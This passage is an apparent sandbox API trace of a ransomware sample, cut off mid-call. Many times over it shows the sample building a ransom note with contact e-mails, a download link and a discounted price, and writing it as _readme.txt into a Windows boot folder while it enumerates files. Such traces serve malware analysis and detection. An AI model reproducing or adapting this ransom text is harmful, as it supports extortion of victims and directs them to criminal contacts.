tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.080] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd3390 [0128.080] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0128.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 0x7516fe8 [0128.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85c) returned 0x49db7d8 [0128.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x49db7d8, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 1117 [0128.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x49dc040 [0128.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db7d8 | out: hHeap=0x4970000) returned 1 [0128.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.080] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 1116 [0128.081] WriteFile (in: hFile=0x5c4, lpBuffer=0x49dc040*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0xe00fb64, lpOverlapped=0x0 | out: lpBuffer=0x49dc040*, lpNumberOfBytesWritten=0xe00fb64*=0x45c, lpOverlapped=0x0) returned 1 [0128.082] CloseHandle (hObject=0x5c4) returned 1 [0128.082] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dc040 | out: hHeap=0x4970000) returned 1 [0128.082] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0128.082] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0128.082] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.082] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0128.082] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.082] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.082] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0128.083] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3904b80, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0128.083] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3904b80, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0128.083] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0128.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0128.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0128.083] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, 